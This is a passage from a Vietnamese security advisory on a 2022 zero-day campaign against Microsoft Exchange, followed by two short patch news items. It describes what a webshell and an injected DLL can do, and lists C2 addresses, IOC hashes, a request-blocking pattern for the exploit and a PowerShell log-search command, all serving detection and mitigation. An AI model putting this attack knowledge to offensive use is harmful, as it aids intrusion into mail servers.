 Case 3: Gọi tới method ld. Method này có nhiệm vụ liệt kê thông tin thư mục và file theo format

D|-|<Ngày tạo> |<Ngày chỉnh sửa> |<tên thư mục hoặc tên file>

o   Case 4: Gọi tới method wf. Method này có nhiệm vụ ghi file

o   Case 5: Gọi tới method rf. Method này có nhiệm vụ đọc file

 Case 6: Tạo thư mục

o   Case 7: Xóa file hoặc thư mục

o   Case 8: Di chuyển File

o   Case 9: Set time cho file 

o   Case 10: Nạp và thực thi C# bytecode nhận từ request.

Các mẫu DLL khác có nhiệm vụ tương tự, chỉ khác nhau về cấu hình listener như sau:

                Victim 1:

https://*:443/ews/web/webconfig/

https://*:443/owa/auth/webcccsd/

https://*:444/ews/auto/

https://*:444/ews/web/api/

                Victim 2:

                                     http://*:80/owa/auth/Current/script/

https://*:443/owa/auth/Current/script/

Chúng tôi cũng phát hiện DLL được inject vào memory của tiến trình svchost.exe. DLL thực hiện kết nối gửi nhận dữ liệu tới địa chỉ 137[.]184[.]67[.]33 được config trong binary. Việc gửi nhận dữ liệu với C2 sử dụng thuật toán RC4, khóa sẽ được tạo trong thời gian chạy (runtime).

Các biện pháp ngăn chặn tạm thời

Quá trình xử lý sự cố trực tiếp của GTSC ghi nhận có trên 1 đơn vị tổ chức bị là nạn nhân của chiến dịch tấn công khai thác lỗ hổng zero day. Ngoài ra chúng tôi cũng lo ngại rằng có thể có nhiều tổ chức khác cũng đã bị khai thác nhưng chưa được phát hiện. Trong thời gian chờ đợi bản vá chính thức từ hãng, GTSC cung cấp biện pháp khắc phục tạm thời nhằm giảm thiểu việc tấn công khai thác lổ hổng bằng cách bổ sung rule chặn các request có dấu hiệu tấn công thông qua module URL Rewrite rule trên máy chủ IIS (Webserver)

– Trong Autodiscover tại FrontEnd chọn tab URL Rewrite chọn Request Blocking

– Add thêm chuỗi “.*autodiscover\.json.*\@.*Powershell.*“ vào Pattern (URL Path):   

– Condition input: lựa chọn {REQUEST_URI}

Phát hiện tấn công

Nhằm kiểm tra hệ thống đã bị tấn công bởi lổ hỗng này, các đơn vị/tổ chức có thể thực hiện theo các cách thức sau:

Cách 1: Sử dụng powershell với câu lệnh sau: (Sử dụng powershell để thực hiện search trên toàn bộ folder log IIS mất khá nhiều thời gian)

Get-ChildItem -Recurse -Path <Path_IIS_Logs> -Filter “*.log” | Select-String -Pattern ‘powershell.*autodiscover\.json.*\@.*200

Cấu hình mặc định IIS log nằm tại đường dẫn “%SystemDrive%\inetpub\logs\LogFiles”

Cách 2: Sử dụng công cụ do GTSC phát triển dựa trên dấu hiệu khai thác lỗ hổng, thời gian thực hiện search nhanh hơn so với việc sử dụng powershell. Đường dẫn tải về công cụ: https://github.com/ncsgroupvn/NCSE0Scanner

Cách 3: Sử dụng công cụ của MS luôn nhé Exchange On-premises Mitigation Tool v2 (EOMTv2) link download tại đây

Indicators of Compromise (IOCs)

Webshell:

File Name: pxh4HG1v.ashx

                Hash (SHA256): c838e77afe750d713e67ffeb4ec1b82ee9066cbe21f11181fd34429f70831ec1

                Path: C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\pxh4HG1v.ashx

File Name: RedirSuiteServiceProxy.aspx

                Hash (SHA256): 65a002fe655dc1751add167cf00adf284c080ab2e97cd386881518d3a31d27f5

                Path: C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\RedirSuiteServiceProxy.aspx

File Name: RedirSuiteServiceProxy.aspx

                Hash (SHA256): b5038f1912e7253c7747d2f0fa5310ee8319288f818392298fd92009926268ca

                Path: C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\RedirSuiteServiceProxy.aspx

File Name: Xml.ashx

                Hash (SHA256): c838e77afe750d713e67ffeb4ec1b82ee9066cbe21f11181fd34429f70831ec1

                Path: C:\inetpub\wwwroot\aspnet_client\Xml.ashx

Filename: errorEE.aspx

SHA256: be07bd9310d7a487ca2f49bcdaafb9513c0c8f99921fdf79a05eaba25b52d257

Path: C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\errorEE.aspx

DLL

File name: Dll.dll

SHA256:

074eb0e75bb2d8f59f1fd571a8c5b76f9c899834893da6f7591b68531f2b5d82

45c8233236a69a081ee390d4faa253177180b2bd45d8ed08369e07429ffbe0a9

9ceca98c2b24ee30d64184d9d2470f6f2509ed914dafb87604123057a14c57c0

29b75f0db3006440651c6342dc3c0672210cfb339141c75e12f6c84d990931c3

c8c907a67955bcdf07dd11d35f2a23498fb5ffe5c6b5d7f36870cf07da47bff2

File name: 180000000.dll (Dump từ tiến trình Svchost.exe)

SHA256: 76a2f2644cb372f540e179ca2baa110b71de3370bb560aca65dcddbd7da3701e

IP

125[.]212[.]220[.]48

5[.]180[.]61[.]17

47[.]242[.]39[.]92

61[.]244[.]94[.]85

86[.]48[.]6[.]69

86[.]48[.]12[.]64

94[.]140[.]8[.]48

94[.]140[.]8[.]113

103[.]9[.]76[.]208

103[.]9[.]76[.]211

104[.]244[.]79[.]6

112[.]118[.]48[.]186

122[.]155[.]174[.]188

125[.]212[.]241[.]134

185[.]220[.]101[.]182

194[.]150[.]167[.]88

212[.]119[.]34[.]11

URL:

hxxp://206[.]188[.]196[.]77:8080/themes.aspx

C2:

137[.]184[.]67[.]33

Mitre ATT&CK Mapping

TaticIDName
Resource DevelopmentT1586.002Compromise Accounts: Email Accounts
ExecutionT1059.003Command and Scripting Interpreter: Windows Command Shell
ExecutionT1047Windows Management Instrumentation
PersistenceT1505.003Server Software Component: Web Shell
Defense EvasionT1070.004Indicator Removal on Host: File Deletion
Defense EvasionT1036.005Masquerading: Match Legitimate Name or Location
Defense EvasionT1620Reflective Code Loading
Credential AccessT1003.001OS Credential Dumping: LSASS Memory
DiscoveryT1087Account Discovery
DiscoveryT1083File and Directory Discovery
DiscoveryT1057Process Discovery
DiscoveryT1049System Network Connections Discovery
Lateral MovementT1570Lateral Tool Transfer
CollectionT1560.001Archive Collected Data: Archive via Utility

28/09/2022 

GTSC SECURITY TEAM

Link: https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html

Microsoft vá 63 lỗ hổng bảo mật Windows

Trong bản cập nhật Patch Tuesday tháng 9, Microsoft phát hành bản vá cho tổng cộng 63 lỗ hổng trên Windows.

Theo Microsoft, 5 trong số 63 lỗ hổng được xếp loại “nghiêm trọng” do kẻ xấu có thể lợi dụng để thực thi mã từ xa. Đây là một trong những loại lỗ hổng nguy hiểm nhất. Patch Tuesday tháng 9 vá 2 lỗ hổng zero-day đã được công bố, trong đó có 1 lỗ hổng đang được khai thác trong thực tế.

Microsoft phân loại một lỗ hổng là zero-day nếu nó đã được công bố hoặc được khai thác mà chưa có bản vá. Lỗ hổng zero-day được vá hôm nay là “CVE-2022-37969”. Nếu khai thác thành công, thủ phạm có thể chiếm được các đặc quyền hệ thống. Nó được các nhà nghiên cứu tại DBAPPSecurity, Mandiant, CrowdStrike và Zscaler phát hiện. Theo Dhanesh Kizhakkinan – Kỹ sư lỗ hổng cấp cao của Mandiant, dường như lỗ hổng nằm riêng lẻ và không thuộc một chuỗi.

“CVE-2022-37969” ảnh hưởng đến các phiên bản Windows từ 7 đến 11, cũng như Windows Servers 2008 và 2012. Chuyên gia bảo mật Mike Walters của Action1 cho biết, do lỗ hổng có độ phức tạp thấp và không cần tương tác của người dùng, nó có thể sớm bị giới hacker khai thác.

Theo Microsoft, lỗ hổng yêu cầu kẻ tấn công phải xâm nhập được vào thiết bị bị xâm phạm hoặc có khả năng khởi chạy mã trên hệ thống mục tiêu. Dustin Childs, Giám đốc tình báo nguy cơ tại Zero Day Initiative, chia sẻ thêm, các loại lỗ hổng này thường được sử dụng trong các hình thức tấn công social engineering như thuyết phục ai đó mở một tập tin hay bấm vào liên kết. Sau khi nạn nhân làm theo, mã bổ sung sẽ dùng đặc quyền leo thang để chiếm đoạt hệ thống.

Người dùng được khuyến nghị nên cập nhật bảo mật ngay khi có thể. Windows 7 cũng được nhận bản vá bảo mật dù đã bị hết hạn hỗ trợ vào năm 2020.

Nguồn  (Theo Bleeping Computer, Forbes)

Bản cập nhật Windows KB5012170 gây ra màn hình khôi phục BitLocker, sự cố khởi động

Người dùng Windows đã cài đặt bản cập nhật bảo mật KB5012170 mới cho Khởi động an toàn đã gặp phải nhiều vấn đề khác nhau, từ lỗi khởi động với lời nhắc Khôi phục BitLocker đến các vấn đề về hiệu suất.

Bộ nạp khởi động UEFI tải ngay sau khi thiết bị được khởi động và chịu trách nhiệm khởi chạy môi trường UEFI với tính năng Khởi động an toàn để chỉ cho phép mã tin cậy được thực thi khi bắt đầu quá trình khởi động Windows.

Trong bản vá thứ ba tháng 8 năm 2022, Microsoft đã phát hành KB5012170 ‘Bản cập nhật bảo mật cho Secure Boot DBX’ độc lập để giải quyết các lỗ hổng được tìm thấy trong các bộ nạp khởi động UEFI khác nhau mà các tác nhân đe dọa có thể sử dụng để bỏ qua tính năng Khởi động Bảo mật của Windows và thực thi mã chưa được ký.